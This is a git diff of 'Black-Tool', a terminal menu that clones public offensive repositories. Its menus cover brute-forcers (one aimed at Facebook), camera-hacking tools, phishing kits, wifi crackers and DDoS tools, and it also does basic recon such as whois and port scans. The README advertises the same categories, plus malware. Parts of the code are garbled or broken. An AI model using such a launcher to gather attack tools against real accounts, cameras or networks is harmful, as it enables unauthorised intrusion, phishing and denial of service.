diff --git a/.github/FUNDING.yml b/.github/FUNDING.yml new file mode 100644 index 0000000..bd0daa3 --- /dev/null +++ b/.github/FUNDING.yml @@ -0,0 +1,5 @@ +# Mr.Programmer2938 + +github: https://github.com/mrprogrammer2938 +Instagram: https://instagram/mrprogrammer2938 +Pinterest: https://www.pinterest.com/mrprogrammer2938 diff --git a/Core/C++-File/Version.txt b/Core/C++-File/Version.txt deleted file mode 100644 index 91e1a5e..0000000 --- a/Core/C++-File/Version.txt +++ /dev/null @@ -1 +0,0 @@ -Black-Tool 1.4.0 diff --git a/Core/C++-File/hack.c++ b/Core/C++-File/hack.c++ deleted file mode 100644 index 84af8f1..0000000 --- a/Core/C++-File/hack.c++ +++ /dev/null @@ -1,48 +0,0 @@ -// !/usr/bin/c++ -// This code write by Mr.nope -// Black-Tool -// Version 1.4.0 -#include -#include -using namespace std; -void title() { - system("xtitle Black Tool"); -} -void cls() { - system("clear"); -} -void ext() { - cls(); - cout<<"\n\033[92mExiting...\033[0m"<>c; - if (c == '1') { - cout<<"Installing..."< " - choose = gets.chomp - if choose == '1' - puts "Installing..." - sleep(1) - system("sudo apt install python && python") - system("cd .. && cd .. && chmod a+x hack && chmod +x uninstall && sudo cp hack /usr/bin && sudo cp hack /usr/local/bin") - puts "\nFinish...!" - puts "\nUsage: hack" - try1() - elsif choose == '2' - puts "Starting Black-Tool..." - sleep(2) - system("hack") - elsif choose == '99' - ext() - else - main() - end -end -def try1() - print "\nDo you want to back Main menu? [y/n] " - try_to_menu = gets.chomp - if try_to_menu == 'y' - main() - elsif try_to_menu == 'n' - ext() - else - try1() - end -end -def ext() - cls() - print("\033[92mExiting...\033[0m\n") - exit -end -begin - main() -rescue Interrupt - print "\nCtrl + \n" - puts "\nExiting...\n" - exit -end diff --git a/Core/Version.txt b/Core/Version.txt index 55b8f54..425a113 100644 --- a/Core/Version.txt +++ b/Core/Version.txt @@ -1 +1 @@ -Black-Tool 1.3.0 +Black-Tool v4.0.0 diff --git a/Core/index.html b/Core/index.html new file mode 100644 index 0000000..4634c12 --- /dev/null +++ b/Core/index.html @@ -0,0 +1,66 @@ + + + + Black-Tool + + + + + +
+ +

Black-Tool


+ +
+
+

+ + GitLab +


+
+ + diff --git a/Core/instagram.png b/Core/instagram.png new file mode 100644 index 0000000..4d0b3bf Binary files /dev/null and b/Core/instagram.png differ diff --git a/Core/py-File/Version.txt b/Core/py-File/Version.txt deleted file mode 100644 index 55b8f54..0000000 --- a/Core/py-File/Version.txt +++ /dev/null @@ -1 +0,0 @@ -Black-Tool 1.3.0 diff --git a/Core/py-File/hack b/Core/py-File/hack deleted file mode 100644 index dc737fe..0000000 --- a/Core/py-File/hack +++ /dev/null @@ -1,765 +0,0 @@ -#!/usr/bin/python3 -# This code write by Mr.nope -import os -import time -import sys -import platform -import requests -try: - import socket -except ImportError: - os.system("pip install socket") -try: - import subprocess -except ImportError: - os.system("pip install subprocess") -try: - import ipapi -except ImportError: - os.system("pip install ipapi") -def check_internet_title(): - os.system("printf '\033]2;Black-Tool: Check-Internet\a'") -class color: - red = '\033[91m' - blue = '\033[96m' - End = '\033[0m' - green = '\033[92m' - darkblue = '\033[34m' - org = '\033[33m' - line = '\033[4m' - prlblue = '\033[94m' - white_light = '\033[97m' -def user_search(): - if os.getuid() == 0: - check_internet() - else: - print("\nPlease, Run This Tool as Root!\n") - sys.exit() -def check_internet(host="https://google.com"): - check_internet_title() - cls() - print("\nCheck Internet...\n") - try: - internet = requests.get(host,timeout=12) - if internet.status_code == 200: - try: - print("Internet Connected!") - time.sleep(1) - menu() - except EOFError: - print("\nCtrl + D") - print("\nExiting...") - sys.exit() - else: - print("\nPlease, Check Internet!") - sys.exit() - except: - sys.exit() -opt = color.blue + "\nBlack-Tool~# " + color.End -Black_menu_mass = color.green + "Exiting..." + color.End -system = platform.uname()[0] -ip = "\nEnter ip: " -exm = "\nPlease, Enter Ip!" -packet_2 = "\nEnter packet: " -port = "\nEnter port: " -Black_Hack_version = "Black-Tool 1.4.0" -def title(): - os.system("printf '\033]2;Black-Tool\a'") -def cls(): - os.system("clear") -def ext(): - cls() - print(Black_menu_mass) - sys.exit() -def menu(): - try: - title() - cls() - screen() - black() - except KeyboardInterrupt: - print("\nCtrl + C") - print(color.green + "\nExiting..." + color.End) - sys.exit() -def black(): - print("\n{1}.Black-Tool Attack") - print("{2}.Web-Hacking") - print("{3}.Cam-Hackers") - print("{4}.Phishing") - print("{5}.Wirless Attack") - print("{6}.Web-Info") - print("{7}.Soial-Enginner") - print("{8}.Hacking-Tools") - print("{9}.DDos-Attack") - print("{10}.Update & Uninstall") - print("{11}.Developer") - print("{99}.Exit") - choose = input(opt) - if choose == '1': - Black_Tool_Start() - elif choose == '2': - black_webhacking() - elif choose == '3': - black_Cam_Hacking() - elif choose == '4': - black_Phishing() - elif choose == '5': - black_wirless_Attack() - elif choose == '6': - black_webinfo() - elif choose == '7': - black_soialenginners() - elif choose == '8': - black_Hackingtools() - elif choose == '9': - black_DDos_Attack() - elif choose == '10': - black_Update_Uninstalling() - elif choose == '11': - black_tool_developer() - elif choose == '99': - ext() - elif choose == '': - menu() - elif choose == ' ': - menu() - elif choose == ' ': - menu() - else: - cls() - print(choose + color.red + " Not Found!" + color.End) - try3() -def try_to_black_menu(): - try2 = input("\npress Enter...") - if try2 == '': - menu() - else: - menu() -def Black_Tool_Start(): - cls() - os.system("figlet Black Tool|lolcat") - print("\n{1}.Portscan") - print("{2}.DDos-Attack") - print("{3}.Ping Test") - print("{4}.Web Loction") - print("{5}.WhoIs lookup") - print("{6}.nslookup") - print("{7}.Ip Search") - print("{8}.40") - print("{99}.mein menu") - choose_black = input(opt) - if choose_black == '1': - black_portscan() - elif choose_black == '2': - black_ddosattack() - elif choose_black == '3': - black_ping() - elif choose_black == '4': - black_weblocation() - elif choose_black == '5': - black_whois_lookup() - elif choose_black == '6': - black_nslookup() - elif choose_black == '7': - black_ip_search() - elif choose_black == '8': - black_installing_40_tool() - elif choose_black == '99': - menu() - elif choose_black == '': - Black_Tool_Start() - elif choose_black == ' ': - Black_Tool_Start() - elif choose_black == ' ': - Black_Tool_Start() - else: - cls() - print(choose_black + color.red + " Not Found!" + color.End) - try4() -def screen(): - print(color.green + """ - ███████████ ████ █████ ███████████ ████ - ░░███░░░░░███░░███ ░░███ ░█░░░███░░░█ ░░███ - ░███ ░███ ░███ ██████ ██████ ░███ █████ ░ ░███ ░ ██████ ██████ ░███ """ + color.red + "Version: " + color.blue + "1.4.0" + color.green + """ - ░██████████ ░███ ░░░░░███ ███░░███ ░███░░███ ░███ ███░░███ ███░░███ ░███ - ░███░░░░░███ ░███ ███████ ░███ ░░░ ░██████░ ░███ ░███ ░███░███ ░███ ░███ - ░███ ░███ ░███ ███░░███ ░███ ███ ░███░░███ ░███ ░███ ░███░███ ░███ ░███ - ███████████ █████░░████████░░██████ ████ █████ █████ ░░██████ ░░██████ █████ - ░░░░░░░░░░░ ░░░░░ ░░░░░░░░ ░░░░░░ ░░░░ ░░░░░ ░░░░░ ░░░░░░ ░░░░░░ ░░░░░ \n""" + color.org + """ - ---[This code write by """ + color.End + color.line + "Mr.nope" + color.End + color.org + " ]----" + color.End) - -def black_webhacking(): - cls() - print(color.blue) - os.system("figlet Web Hacking") - print("\n{1}.brute-Force") - print("{2}.bruteX") - print("{3}.Brute-Boom") - print("{4}.Bruter") - print("{5}.FaceBook-Bruteforce") - print("{99}.mein menu") - choose2 = input(opt) - if choose2 == '1': - cls() - os.system("git clone https://github.com/mrprogrammer2938/Brute-Force") - try3() - elif choose2 == '2': - cls() - os.system("git clone https://github.com/1N3/BruteX") - try3() - elif choose2 == '3': - cls() - os.system("git clone https://github.com/Oseid/FaceBoom") - try3() - elif choose2 == '4': - cls() - os.system("git clone https://github.com/AzizKpln/Bruter19") - try3() - elif choose2 == '5': - cls() - os.system("git clone https://github.com/IAmBlackHacker/Facebook-BruteForce") - try3() - elif choose2 == '99': - menu() - else: - black_webhacking() -def black_nslookup(): - cls() - host8 = input(ip) - attack_nslookup = subprocess.getoutput("nslookup " + host8) - print(attack_nslookup) - try11() -def arg(): - if sys.argv[1] == '--clone': - print(color.green + "Stating Cloning..." + color.End) - os.system("git clone " + sys.argv[2]) - print("Exiting...") - sys.exit() - elif sys.argv[1] == '--version': - print(Black_Hack_version) - elif sys.argv[1] == '--start': - user_search() - elif sys.argv[1] == '--install': - print(color.green + "Starting Downloading..." + color.End) - os.system("sudo apt install " + sys.argv[2]) - print("Exiting...") - sys.exit() - elif sys.argv[1] == '--help': - black_tool_help() - else: - print("\nPlease, Check Argument!\n") - sys.exit() -def black_installing_40_tool(): - cls() - os.system("figlet -f slant 40|lolcat") - print("\n") - os.system("git clone https://github.com/mrprogrammer2938/40") - print("\nComplete!") - try15() -def black_ip_search(): - cls() - print("{1}.Online") - print("{2}.Installing IPz pkg") - print("{99}.mein menu") - choose12 = input(opt) - if choose12 == '1': - start_ip_search() - elif choose12 == '2': - cls() - installing_ipz = subprocess.getoutput("git clone https://github.com/mrprogrammer2938/IPz") - print(installing_ipz) - try14() - elif choose12 == '99': - Black_Tool_Start() - else: - black_ip_search() -def black_Cam_Hacking(): - cls() - print(color.blue) - os.system("figlet Cam Hacking") - print(color.End) - print("\n{1}.Cam-Hackers") - print("{2}.Cam-Hack-ang") - print("{3}.say cheese") - print("{4}.say Master") - print("{5}.Cam-Phish") - print("{99}.mein menu") - choose3 = input(opt) - if choose3 == '1': - cls() - os.system("git clone https://github.com/mrprogrammer2938") - try3() - elif choose3 == '2': - cls() - os.system("git clone https://github.com/AngelSecurityTeam/Cam-Hackers") - try3() - elif choose3 == '3': - cls() - os.system("git clone https://github.com/keralahackers/saycheese") - try3() - elif choose3 == '4': - cls() - os.system("git clone https://github.com/joshkar/SayMaster") - try3() - elif choose3 == '5': - cls() - os.system("git clone https://github.com/techchipnet/CamPhish/ Cam-Phish/") - try3() - elif choose3 == '99': - menu() - else: - black_Cam_Hacking() -def black_tool_help(): - print(""" -Black-Tool Usage: - --start start Hack Menu! - --install + pkg - --clone + Repositories - --version Black-Tool version - --help + Black-Tool Help -""") -def black_portscan(): - cls() - print("\n{1}.Online") - print("{2}.Installing Portscan") - print("{3}.mein menu") - choose10 = input(opt) - if choose10 == '1': - portscan_attack() - elif choose10 == '2': - cls() - os.system("git clone https://github.com/mrprogrammer2938/Portscan") - try4() - elif choose10 == '3': - Black_Tool_Start() - else: - black_portscan() -def black_ddosattack(): - cls() - os.system("git clone https://github.com/mrprogrammer2938/DDos-Attack") - try4() -def black_ping(): - cls() - host3 = input(ip) - packet = input(packet_2) - time.sleep(2) - c = subprocess.getoutput("ping -w " + packet + " " + host3) - print(c) - time.sleep(2) - try4() -def start_ip_search(): - cls() - web2 = input(ip) - time.sleep(1) - sock = socket.gethostbyname(web2) - print("Ip: " + sock) - try13() -def try4(): - try_to_mein1 = input("\npress Enter...") - if try_to_mein1 == '': - Black_Tool_Start() - else: - Black_Tool_Start() -def black_weblocation(): - cls() - print(exm) - site = input(ip) - try: - search = ipapi.location(ip=site, key=None) - print("\n") - print(Fore.RED + "[~] " + Fore.WHITE + "Ip: " + Fore.GREEN + search["ip"]) - print(Fore.RED + "[~] " + Fore.WHITE + "City " + Fore.GREEN + search["city"]) - print(Fore.RED + "[~] " + Fore.WHITE + "Region " + Fore.GREEN + search["region"]) - print(Fore.RED + "[~] " + Fore.WHITE + "Country: " + Fore.GREEN + search["country"]) - print(Fore.RED + "[~] " + Fore.WHITE + "Org: " + Fore.GREEN + search["org"]) - print(Fore.RED + "[~] " + Fore.WHITE + "Time Zone: " + Fore.GREEN + search["timezone"]) - print(Fore.RED + "[~] " + Fore.WHITE + "Languages: " + Fore.GREEN + search["languages"]) - time.sleep(2) - except: - print(color.green + "\nPlease" + color.red + ", Check Ip!\n") - time.sleep(1) - try4() -def portscan_attack(): - cls() - host = input(ip) - attack_portscan = requests.get("https://api.hackertarget.com/nmap/?q=" + host).text - print(attack_portscan) - time.sleep(2) - try6() -def black_whois_lookup(): - cls() - host5 = input(ip) - time.sleep(1) - print(color.white_light) - attack_whois = subprocess.getoutput("whois " + host5) - print(attack_whois) - time.sleep(2) - try7() -def Developer(): - os.system("figlet -f slant Black-Tool|lolcat") - print(color.green + "This code write by " + color.blue + "Mr.nope" + color.End) - print(color.red + "\nVersion: " + color.darkblue + "1.4.0" + color.End) - print(color.org + "Github: " + color.green + "https://github.com/mrprogrammer2938" + color.End) - time.sleep(2) - try1() -def try13(): - try_to_search_ip = input("\nDo you want to try again? [y/n] ") - if try_to_search_ip == 'y': - start_search_ip() - elif try_to_search_ip == 'n': - try12() - else: - try13() -def try6(): - try_again_2 = input("\nDo you want to try again? [y/n] ") - if try_again_2 == 'y': - portscan_attack() - elif try_again_2 == 'n': - try5() - else: - try6() -def try15(): - try_to_menu_2_3 = input("\npress Enter...") - if try_to_menu_2_3 == '': - Black_Tool_Start() - else: - Black_Tool_Start() -def black_Phishing(): - cls() - print(color.blue) - os.system("figlet Phishing") - print(color.End) - print("\n{1}.setoolkit") - print("{2}.zphisher") - print("{3}.nex-Phisher") - print("{4}.Social Phish") - print("{5}.Black-phish") - print("{6}.Phish-Mailer") - print("{99}.mein menu") - choose4 = input(opt) - if choose4 == '1': - cls() - os.system("git clone https://github.com/trustedsec/social-engineer-toolkit/ setoolkit/") - try3() - elif choose4 == '2': - cls() - os.system("git clone https://github.com/htr-tech/zphisher") - try3() - elif choose4 == '3': - cls() - os.system("git clone https://github.com/htr-tech/nexphisher") - try3() - elif choose4 == '4': - cls() - os.system("git clone https://github.com/xHak9x/SocialPhish") - try3() - elif choose4 == '5': - cls() - os.system("git clone https://github.com/iinc0gnit0/BlackPhish") - try3() - elif choose4 == '6': - cls() - os.system("git clone https://github.com/BiZken/PhishMailer") - try3() - elif choose4 == '99': - menu() - else: - black_Phishing() -def try14(): - try_to_menu2_2 = input("\npress Enter...") - if try_to_menu2_2 == '': - black_ip_search() - else: - black_ip_search() -def try_to_black_menu(): - try4 = input("\npress Enter...") - if try4 == '': - Black_Tool_Start() - else: - Black_Tool_Start() -def try5(): - try_again_1 = input("\npress Enter...") - if try_again_1 == '': - Black_Tool_Start() - else: - Black_Tool_Start() -def black_wirless_Attack(): - cls() - print(color.blue) - os.system("figlet Wirless Attack") - print(color.End) - print("\n{1}.wifite") - print("{2}.Airattackit") - print("{3}.wifispy") - print("{4}.wifi-God") - print("{5}.wifi-cracker") - print("{99}.mein menu") - choose5 = input(opt) - if choose5 == '1': - cls() - os.system("git clone https://github.com/derv82/wifite") - try3() - elif choose5 == '2': - cls() - os.system("git clone https://github.com/JoyGhoshs/Airattackit") - elif choose5 == '3': - cls() - os.system("git clone https://github.com/AresS31/wirespy") - try3() - elif choose5 == '4': - cls() - os.system("git clone https://github.com/waseem-sajjad/WifiGod") - try3() - elif choose5 == '5': - cls() - os.system("git clone https://github.com/brannondorsey/wifi-cracking") - try3() - elif choose5 == '99': - menu() - else: - black_wirless_Attack() -def try1(): - try_to_black_tool = input("\npress Enter...") - if try_to_black_tool == '': - menu() - else: - menu() -def black_webinfo(): - cls() - print(color.blue) - os.system("figlet Web Info") - print(color.End) - print("\n{1}.Web-Info") - print("{2}.setookit") - print("{3}.webkiller") - print("{4}.web informtion") - print("{5}.Th3inspector") - print("{99}.mein menu") - choose6 = input(opt) - if choose6 == '1': - cls() - os.system("git clone https://github.com/mrprogrammer2938/Web-Info") - try3() - elif choose6 == '2': - cls() - os.system("git clone https://github.com/trustedsec/social-engineer-toolkit") - try3() - elif choose6 == '3': - cls() - os.system("git clone https://github.com/ultrasecurity/webkiller") - try3() - elif choose6 == '4': - cls() - os.system("git clone https://github.com/zahidin/web-information-gathering") - try3() - elif choose6 == '5': - cls() - os.system("git clone https://github.com/Moham3dRiahi/Th3inspector") - try3() - elif choose6 == '99': - menu() - else: - black_webinfo() -def black_soialenginners(): - cls() - print(color.blue) - os.system("figlet social Engineer toolkit") - print(color.End) - print("\n{1}.setoolkit") - print("{2}.focial") - print("{3}.fluxion") - print("{99}.mein menu") - choose7 = input(opt) - if choose7 == '1': - cls() - os.system("git clone https://github.com/trustedsec/social-engineer-toolkit/ setoolkit/") - try3() - elif choose7 == '2': - cls() - os.system("git clone https://github.com/v2-dev/awesome-social-engineering/ focial/") - try3() - elif choose7 == '3': - cls() - os.system("git clone https://github.com/FluxionNetwork/fluxion") - try3() - elif choose7 == '99': - menu() - else: - black_soialenginners() -def black_Hackingtools(): - cls() - print(color.blue) - os.system("figlet Hacking Tools") - print(color.End) - print("\n{1}.Hacking-Tools") - print("{2}.Hack-Tools") - print("{3}.fsociety") - print("{4}.PTool") - print("{5}.onex") - print("{99}.mein menu") - choose7 = input(opt) - if choose7 == '1': - cls() - os.system("git clone https://github.com/mrprogrammer2938/hackingtools") - try3() - elif choose7 == '2': - cls() - os.system("git clone https://github.com/Z4nzu/hackingtool") - try3() - elif choose7 == '3': - cls() - os.system("git clone https://github.com/Manisso/fsociety") - try3() - elif choose7 == '4': - cls() - os.system("git clone https://github.com/mrprogrammer2938/PTool") - try3() - elif choose7 == '5': - cls() - os.system("git clone https://github.com/rajkumardusad/onex") - try3() - elif choose7 == '99': - menu() - else: - black_Hackingtools() -def try7(): - try_to_whois_attack = input("\nDo you want to try again? [y/n] ") - if try_to_whois_attack == 'y': - black_whois_lookup() - elif try_to_whois_attack == 'n': - try4() - else: - try7() -def black_DDos_Attack(): - cls() - print(color.blue) - os.system("figlet DDos Attack") - print(color.End) - print("\n{1}.DDos-Attack") - print("{2}.hammer") - print("{3}.Liteddos") - print("{4}.Rave-Tool") - print("{5}.DDos-Attack-Mrx") - print("{99}.mein menu") - choose8 = input(opt) - if choose8 == '1': - cls() - os.system("git clone https://github.com/mrprogrammer2938/DDos-Attack") - try3() - elif choose8 == '2': - cls() - os.system("git clone https://github.com/cyweb/hammer") - try3() - elif choose8 == '3': - cls() - os.system("git clone https://github.com/4L13199/LITEDDOS") - try3() - elif choose8 == '4': - cls() - os.system("git clone https://github.com/Taguar258/Raven-Storm/ Rave-Tool/") - try3() - elif choose8 == '5': - cls() - os.system("git clone DDos-Attack-Mrx = https://github.com/Ha3MrX/DDos-Attack/ DDos-Attack-Mrx/") - try3() - elif choose8 == '99': - menu() - else: - black_DDos_Attack() -def black_Update_Uninstalling(): - cls() - os.system("figlet -f slant Black-Tool|lolcat") - print("\n{1}.Update") - print("{2}.Uninstall") - print("{3}.mein menu") - choose9 = input(opt) - if choose9 == '1': - black_update() - elif choose9 == '2': - black_uninstall() - elif choose9 == '3': - menu() - else: - black_Update_Uninstalling() -def black_tool_developer(): - os.system("printf '\033]2;Black-Tool\a'") - cls() - os.system("figlet -f slant Black-Tool|lolcat") - print(color.green + "\nThis code write by " + color.blue + "Mr.nope" + color.End) - print(color.prlblue + "\nProgramm Name: " + color.red + "Black-Tool" + color.End) - print(color.red + "\nVersion: " + color.darkblue + "1.4.0" + color.End) - print(color.org + "\nGithub: " + color.green + "https://github.com/mrprogrammer2938" + color.End) - time.sleep(2) - try3() -def try3(): - try_to_choose_opt = input("\npress Enter...") - if try_to_choose_opt == '': - menu() - else: - menu() -def black_update(): - if system == 'Linux': - os.system("cd .. && sudo rm Black-Tool") - os.system("git clone https://github.com/mrprogrammer2938/Black-Tool") - try10() - elif system == 'Mac': - os.system("cd .. && sudo rm -r Black-Tool") - os.system("git clone https://github.com/mrprogrammer2938/Black-Tool") - try10() - elif system == 'Windows': - cls() - print("\nThis Programm Can Not Run Your OS!\n") - sys.exit() - else: - print("\nThis, Programm Can Run on Linux,MacOS\n") - time.sleep(2) - try9() -def black_uninstall(): - if system == 'Linux': - os.system("cd /usr/local/bin && sudo rm hack") - print("\nPlease, Using: ./uninstall in hack file") - try8() - elif system == 'Mac': - os.system("cd /usr/local/bin && sudo rm hack") - print("\nPlease, Using: ./uninstall in hack file") - try8() - elif system == 'Windows': - cls() - print("\nThis Programm Can Not Run Your OS!\n") - sys.exit() - else: - print("\nThis, Programm Can Run on +Linux,MacOs\n") - time.sleep(2) - try9() -def try9(): - try_to_mein2 = input("\npress Enter...") - if try_to_mein2 == '': - menu() - else: - menu() -def try10(): - try_to_mein3 = input("\npress Enter...") - if try_to_mein3 == '': - ext() - else: - ext() -def try11(): - try_again_nslookup = input("Do you want to try again? [y/n] ") - if try_again_nslookup == 'y': - black_nslookup() - elif try_again_nslookup == 'n': - try12() - else: - try11() -def try12(): - try_to_menu_5 = input("\npress Enter...") - if try_to_menu_5 == '': - Black_Tool_Start() - else: - Black_Tool_Start() -if __name__ == '__main__': - try: - arg() - except IndexError: - print("\nPlease, Usage: --help\n") - sys.exit() diff --git a/Core/style.css b/Core/style.css new file mode 100644 index 0000000..6f4a6af --- /dev/null +++ b/Core/style.css @@ -0,0 +1,23 @@ +/* +Black-Tool +*/ + +body { + background-color: antiquewhite +} + +color1 { + color: green; +} + +color2 { + color: cornflowerblue; +} + +color3 { + color: blanchedalmond; +} + +color4 { + color: darkslategrey; +} \ No newline at end of file diff --git a/Help.txt b/Help.txt deleted file mode 100644 index 8d051dc..0000000 --- a/Help.txt +++ /dev/null @@ -1,20 +0,0 @@ -Installing: - - git clone https://github.com/mrprgrammer2938/Black-Tool - - cd Black-Tool - - ./install.sh - - hack --help ------------------------------------------------------------------------------------------- -Updating: - - cd Update - - ./update - ------------------------------------------------------------------------------------------- -Uninstalling: - - ./uninstall diff --git a/LICENSE b/LICENSE index 5d46cdb..f410420 100644 --- a/LICENSE +++ b/LICENSE @@ -1,6 +1,6 @@ MIT License -Copyright (c) 2021 Mr.programmer +Copyright (c) 2021 Mr.programmer2938 Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal diff --git a/README.md b/README.md index 5285e21..4f49f02 100644 --- a/README.md +++ b/README.md @@ -1,63 +1,168 @@ -# Black-Tool ⬛⬛⬛ -Install the tools and start hacking Attacking ! -``` - ███████████ ████ █████ ███████████ ████ -░░███░░░░░███░░███ ░░███ ░█░░░███░░░█ ░░███ - ░███ ░███ ░███ ██████ ██████ ░███ █████ ░ ░███ ░ ██████ ██████ ░███ - ░██████████ ░███ ░░░░░███ ███░░███ ░███░░███ ░███ ███░░███ ███░░███ ░███ - ░███░░░░░███ ░███ ███████ ░███ ░░░ ░██████░ ░███ ░███ ░███░███ ░███ ░███ - ░███ ░███ ░███ ███░░███ ░███ ███ ░███░░███ ░███ ░███ ░███░███ ░███ ░███ - ███████████ █████░░████████░░██████ ████ █████ █████ ░░██████ ░░██████ █████ -░░░░░░░░░░░ ░░░░░ ░░░░░░░░ ░░░░░░ ░░░░ ░░░░░ ░░░░░ ░░░░░░ ░░░░░░ ░░░░░ + +
+ +# [Black-Tool](https://github.com/mrprogrammer2938/Black-Tool) +
+ +
+ + +
+ + Black-Tool logo + +

+ + +```Black-Tool v5.5.5 (New)``` +
+ +[![Python 3.12](https://img.shields.io/badge/Python-3.12-yellow.svg)](https://www.python.org/downloads/) + +#### Install the tools and start hacking Attack! + +[Black-Tool](https://github.com/mrprogrammer2938/Black-Tool) + +
+ +``` + ███████████ ████ █████ ███████████ ████ + ░░███░░░░░███░░███ ░░███ ░█░░░███░░░█ ░░███ + ░███ ░███ ░███ ██████ ██████ ░███ █████ ░ ░███ ░ ██████ ██████ ░███ + ░██████████ ░███ ░░░░░███ ███░░███ ░███░░███ ░███ ███░░███ ███░░███ ░███ + ░███░░░░░███ ░███ ███████ ░███ ░░░ ░██████░ ░███ ░███ ░███░███ ░███ ░███ + ░███ ░███ ░███ ███░░███ ░███ ███ ░███░░███ ░███ ░███ ░███░███ ░███ ░███ + ███████████ █████░░████████░░██████ ████ █████ █████ ░░██████ ░░██████ █████ + ░░░░░░░░░░░ ░░░░░ ░░░░░░░░ ░░░░░░ ░░░░ ░░░░░ ░░░░░ ░░░░░░ ░░░░░░ ░░░░░ ``` +
+
+ +### This Program write by [Sina Coder](https://github.com/mrprogrammer2938) +
+ +| Link | Version | Suport | +|:------|:-------:|------:| +| [Black-Tool](https://github.com/mrprogrammer2938/black-tool) | v5.5.5 | (Linux,Windows,MacOS) | +| [Black-Tool](https://github.com/Black-Tool/Black-Tool) | v2.6.5 | (Linux,MacOS) | + +
+
+ +## Scr +
+ +[![Black-Tool-Screen](https://github.com/mrprogrammer2938/Black-Tool/blob/master/Scr/black-tool-scr.png)](https://github.com/mrprogrammer2938/Black-Tool) + +[![Black-Tool-Screen2](https://github.com/mrprogrammer2938/Black-Tool/blob/master/Scr/black-tool-scr-2.png)](https://github.com/mrprogrammer2938/Black-Tool) + +
+ +## Black-Tool Tools +
+ +#### Information-Gathering +- Nmap +- [WPScan](https://github.com/wpscanteam/wpscan) +- [Setoolkit](https://github.com/trustedsec/social-engineer-toolkit) +- [Web Info](https://github.com/zahidin/web-information-gathering) +- [CMS Scanner](https://github.com/ajinabraham/CMSScan) + +#### Web Hacking +- [Brutex](https://github.com/1N3/BruteX) +- [SkipFish](https://github.com/spinkham/skipfish) +- [Blazy](https://github.com/s0md3v/Blazy) +- PortScanner + +#### Cam Hacker +- [Cam Hackers](https://github.com/AngelSecurityTeam/Cam-Hackers) +- [Cam Dumper](https://github.com/erfannoori/Cam-Dumper) +- [SEE U](https://github.com/GloveB/Cam-Hack) +- [Cam Phish](https://github.com/baradatipu/CamPhish) + -This code write by [Mr.nope](https://github.com/mrprogrammer2938) +#### Wirless Attack +- [Reaver](https://github.com/t6x/reaver-wps-fork-t6x) +- [Wifite](https://github.com/derv82/wifite) +- [Airattackit](https://github.com/JoyGhoshs/Airattackit) -## Web -[Black Tool](https://60d8dc3633fbe.mywebzi.ir/) -#### Scr -[![Black-Tool-Scr-1](https://user-images.githubusercontent.com/78996423/121770983-e057c400-cb81-11eb-95ab-cbfb052b29a2.jpeg)](https://github.com/mrprogrammer2938/Black-Tool) +#### Password Attack +- [Cupp](https://github.com/Mebus/cupp) +- [NCrack](https://github.com/nmap/ncrack) + +#### Dos +- Dos + +#### Malware +- Android +- Windows + +#### Sniffing Spoofing +- [Say Cheese](https://github.com/hangetzzu/saycheese) +- [PyPhisher](https://github.com/KasRoudra2/PyPhisher) +- [Storm-Breaker](https://github.com/ultrasecurity/Storm-Breaker) +- [Setoolkit](https://github.com/trustedsec/social-engineer-toolkit) + +

+ +### Installing View [Youtube](https://youtu.be/qPVos1R05vo) **Installing** -``` -git clone https://github.com/mrprogrammer2938/ Black-Tool + +
+git clone https://github.com/mrprogrammer2938/black-tool
 
 cd Black-Tool
 
 bash install.sh
+
+
-hack --help +*Run* +``` sh +python3 hack ``` -## Working... -``` -Black-Tool Usage: - --start start Hack Menu! - --install + pkg - --clone + Repositories - --version Black-Tool version - --help + Black-Tool Help -``` -### Update... -``` -cd Update +### Black-Tool [Developer](https://github.com/mrprogrammer2938/Black-Tool/tree/master/Developer) -./update -``` +#### Black-Tool [Help](https://github.com/mrprogrammer2938/Black-Tool/tree/master/Help) +
-###### Uninstalling -``` -./uninstall.sh -``` +#### What is Black-Tool? + +#### [Read](https://github.com/mrprogrammer2938/Black-Tool-Read)... + +#### [Github.Io](https://mrprogrammer2938.github.io/Black-Tool) +
+ +### Download [Black-Webbrowser](https://github.com/black-software-Com/Black-Webbrowser) Now! +##### If you want to become a Black-Team member -[![Black_Tool_Banner_Pictures](https://user-images.githubusercontent.com/78996423/123559118-588fcd80-d7af-11eb-8552-e740bfba75de.jpeg)](https://github.com/mrprogrammer2938/Black-Tool) +###### Email us + +``` txt +gg1504722@gmail.com +mrprogrammer2938@gmail.com +``` +
-🔽🔽🔽 ### [Mr.nope](https://github.com/mrprogrammer2938) Account... -[Instagram](https://instagram.com/programmer2938) +[Instagram](https://instagram.com/sina.coder) [Pinterest](https://www.pinterest.com/mrprogrammer2938) + + +
+ diff --git a/Scr/Black_Tool_Banner_Pictures.jpeg b/Scr/Black_Tool_Banner_Pictures.jpeg new file mode 100644 index 0000000..1df42f5 Binary files /dev/null and b/Scr/Black_Tool_Banner_Pictures.jpeg differ diff --git a/Scr/Black_Tool_Logo.png b/Scr/Black_Tool_Logo.png new file mode 100644 index 0000000..e76e6d7 Binary files /dev/null and b/Scr/Black_Tool_Logo.png differ diff --git a/Scr/black-tool-scr-2.png b/Scr/black-tool-scr-2.png new file mode 100644 index 0000000..7e649ef Binary files /dev/null and b/Scr/black-tool-scr-2.png differ diff --git a/Scr/black-tool-scr.png b/Scr/black-tool-scr.png new file mode 100644 index 0000000..a140172 Binary files /dev/null and b/Scr/black-tool-scr.png differ diff --git a/Scr/black.png b/Scr/black.png new file mode 100644 index 0000000..5f77ef3 Binary files /dev/null and b/Scr/black.png differ diff --git a/Update/update b/Update/update deleted file mode 100644 index 5ee4f50..0000000 --- a/Update/update +++ /dev/null @@ -1,10 +0,0 @@ -#!/usr/bin/bash -# This code write by Mr.nope -clear -echo "Updating..." -sleep 2 -cd .. && cd .. && sudo rm -r Black-Tool && git clone https://github.com/mrprogrammer2938/Black-Tool -echo "" -echo "Updating..., Finish...!" -echo "" -exit 1 diff --git a/Version/Version.txt b/Version/Version.txt new file mode 100644 index 0000000..fa40ae8 --- /dev/null +++ b/Version/Version.txt @@ -0,0 +1 @@ +Black-Tool v5.5.5 diff --git a/Version/ver.txt b/Version/ver.txt deleted file mode 100644 index 91e1a5e..0000000 --- a/Version/ver.txt +++ /dev/null @@ -1 +0,0 @@ -Black-Tool 1.4.0 diff --git a/black.png b/black.png new file mode 100644 index 0000000..5f77ef3 Binary files /dev/null and b/black.png differ diff --git a/hack b/hack deleted file mode 100644 index 0d031e0..0000000 --- a/hack +++ /dev/null @@ -1,2044 +0,0 @@ -#!/usr/bin/python3 -# This code write by Mr.nope -# Version 1.3.0 -# Github: 